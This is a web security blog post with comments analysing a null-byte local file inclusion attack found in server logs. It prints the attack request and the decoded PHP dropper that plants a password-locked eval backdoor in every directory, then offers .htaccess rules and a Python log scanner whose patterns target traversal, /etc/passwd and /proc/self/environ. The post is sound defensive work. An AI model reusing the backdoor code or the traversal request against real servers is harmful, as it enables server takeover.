Symptom: Web server logs show entries similar to "GET /index.php?inc=../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 200 22702 "" "##php eval(base64_decode(\"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\")); ##"
Please note that the <? and > were removed for security reasons and replaced with ##
Description: This is a poisoned null-byte attack, usually conducted by bots. If the trailing null byte is not handled correctly, the include path is truncated at it and an attacker-chosen local file is included in place of the intended one; this technique is called Local File Inclusion (LFI). On top of the LFI, this variant attempts to execute code: the Base64-encoded PHP statement is carried in the request itself (the last quoted field of the log entry, the User-Agent), and /proc/self/environ is requested precisely because that file exposes the request headers to the PHP interpreter.
If this attack succeeds, the server includes /proc/self/environ (or whatever other file was requested) instead of the originally requested file (index.php in this case). If the embedded PHP then runs, it appends its code to the original file and creates a new file whose presence notifies the attacker of success.
Let's delve a bit deeper. Anything prefixed with ## is a comment I inserted into the code. The Base64 inside the eval statement decodes to:
addLoader();
$data = @opendir('.'); ## Open the current directory
while ($file = @readdir($data)) ## Walk every entry in it
{
$file = trim($file);
if (!$file || preg_match('/^\.+$/', $file) || !is_dir($file)) continue; ## Skip empty names, "." and "..", and anything that is not a directory
addLoader($file); ## Plant the backdoor in every subdirectory as well
}
@closedir($data);
function addLoader($dir = '')
{
if ($dir) $dir .= '/'; ## Build the directory prefix ('' means the current directory)
@chmod($dir, 777); ## Intended to make the directory world-writable (note: 777 here is decimal, i.e. octal 1411, not 0777)
$fp = fopen("{$dir}ed69ed60be485ba1dcd007734b836ca8.php", "w"); ## Create the backdoor file and write the contents to it
fwrite($fp, base64_decode('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')); ## Again, the payload is Base64-encoded
fclose($fp);
if (file_exists("{$dir}ed69ed60be485ba1dcd007734b836ca8.php"))
{
$ck = "1823649365820354";
print "$ck:{*}:$dir:{*}:"; ## Print a marker so the bot knows where the file landed
exit;
}
}
## Here is the decoded Base64 payload that gets written to that file
##php
@ini_set('allow_url_fopen', 1); ## Try to override php.ini settings (allow_url_fopen is a system-level setting and cannot actually be changed at runtime)
@ini_set('default_socket_timeout', 60); ## Raise socket and execution time limits so long-running commands finish
@ini_set('max_execution_time', 60);
@set_time_limit(60);
$data = @unserialize(base64_decode(trim(@$_POST['data']))); ## Commands arrive as a Base64-encoded serialized array in the POST field 'data'
if (@!is_array($data) || md5($data['password']) != 'd3df439c3e4b2c41920d8e2733113236') exit; ## Only the attacker's password unlocks the backdoor
if (@$data['code']) eval(base64_decode($data['code'])); ## Execute whatever PHP the attacker sends
if (@$data['check_code']) print $data['check_code']; ## Echo a check value back so the attacker can confirm execution
##
Summary: If successful, this exploit bypasses your PHP settings, sets one of your directories to world access, writes a .php file with the name shown above, and provides a backdoor to your server.
Solutions:
1. Consider using the mod_security add-on for Linux/Unix servers
2. Use .htaccess files to block this kind of request
3. Use a firewall to prevent unwanted access
4. STAY UP TO DATE.
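Besides blocking the requests, a defender wants to find the attempts that already reached the server. The following is an added example (not code from the original post) that scans Apache combined-format access logs for the indicators seen in the entry above: directory traversal, a trailing null byte (including the double-encoded form %2500, which only shows up after a second round of URL decoding), requests for /proc/self/environ or similar files, and PHP code smuggled in the User-Agent header. The three log lines are constructed for the example; the Base64 body in the first one is a placeholder, not the payload from the post.

```python
"""Flag null-byte / directory-traversal / /proc/self/environ probes in Apache
combined-format access logs. Added example, not code from the post; the log
lines below are constructed and the Base64 body is a placeholder."""
import re
from urllib.parse import unquote

# Three constructed log lines: the probe from the post (placeholder Base64 body
# in the User-Agent), a benign Joomla! request, and a double-encoded
# /etc/passwd probe (%2500 decodes to %00 and then to a NUL byte).
SAMPLE_LOG = r"""203.0.113.5 - - [10/Oct/2010:13:55:36 -0700] "GET /index.php?inc=../../../../../../proc/self/environ%00 HTTP/1.0" 200 22702 "" "<?php eval(base64_decode(\"QUJD\")); ?>"
203.0.113.5 - - [10/Oct/2010:13:55:37 -0700] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 9031 "" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2010:13:56:01 -0700] "GET /index.php?inc=..%2F..%2F..%2Fetc%2Fpasswd%2500 HTTP/1.1" 404 512 "" "curl/7.19"
"""

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

# Files an LFI probe typically asks for; /proc/self/environ exposes the request
# headers (including the User-Agent) to the PHP interpreter.
SENSITIVE_PATHS = re.compile(r"/proc/self/environ|/etc/passwd|/etc/shadow", re.I)
# PHP code carried in a header, as in the post's User-Agent field.
PHP_IN_HEADER = re.compile(r"<\?php|eval\s*\(\s*base64_decode", re.I)


def fully_decode(s, max_rounds=3):
    """URL-decode until the string stops changing, so %2500 -> %00 -> NUL is caught."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def analyze_request(target, user_agent):
    """Return the list of indicators found in one request target and its User-Agent."""
    decoded = fully_decode(target)
    findings = []
    if "../" in decoded or "..\\" in decoded:
        findings.append("traversal")
    if "\x00" in decoded:
        findings.append("null_byte")
    if SENSITIVE_PATHS.search(decoded):
        findings.append("sensitive_file")
    if PHP_IN_HEADER.search(user_agent):
        findings.append("php_in_ua")
    return findings


def scan_log(text):
    """Scan combined-format log text; return one record per suspicious line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        findings = analyze_request(m["target"], m["ua"])
        if findings:
            hits.append({
                "line": lineno,
                "ip": m["ip"],
                "status": m["status"],
                # A 200 does not prove the include worked (index.php may have
                # rendered normally), but those lines deserve review first.
                "served_200": m["status"] == "200",
                "findings": findings,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents. Any hit with "php_in_ua" or "sensitive_file" plus a 200 status is the case the post describes and is worth checking on disk for unexpected .php files in world-writable directories.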
I have a few dozen of these in my logs from what appears to be a compromised webhost. The MD5'd password is identical to the one shown in your sample, which indicates it could be set as a default or is in fact the same individual. In my case the attacker appears to be explicitly targeting Joomla! sites, as the URLs in the initial GET request are formatted in Joomla!-specific ways.
Josh,
Be sure you have this statement in your .htaccess file; if you already do, you are in great shape:
#### @RS if the request contains /proc/self/environ
RewriteCond %{QUERY_STRING} proc\/self\/environ [OR]
#### @RS
I would recommend starting here http://docs.joomla.org/Htaccess_examples_%28security%29
You also probably want to ensure the /administrator/ path has an .htaccess file that restricts it to only your IP address, like the following:
# Administrative Block
order deny,allow
deny from all
allow from 123.56.789.0 (Your IP Address)
Just remember that if it's a dynamic IP, you will need to update the .htaccess file every time your IP address changes.
I just received this kind of hacking attempt, which obviously failed. Good thing I had edited my .htaccess and improved my security to the maximum level just a few hours before the hacking attempt occurred. If not, maybe I'd be doomed today. 🙂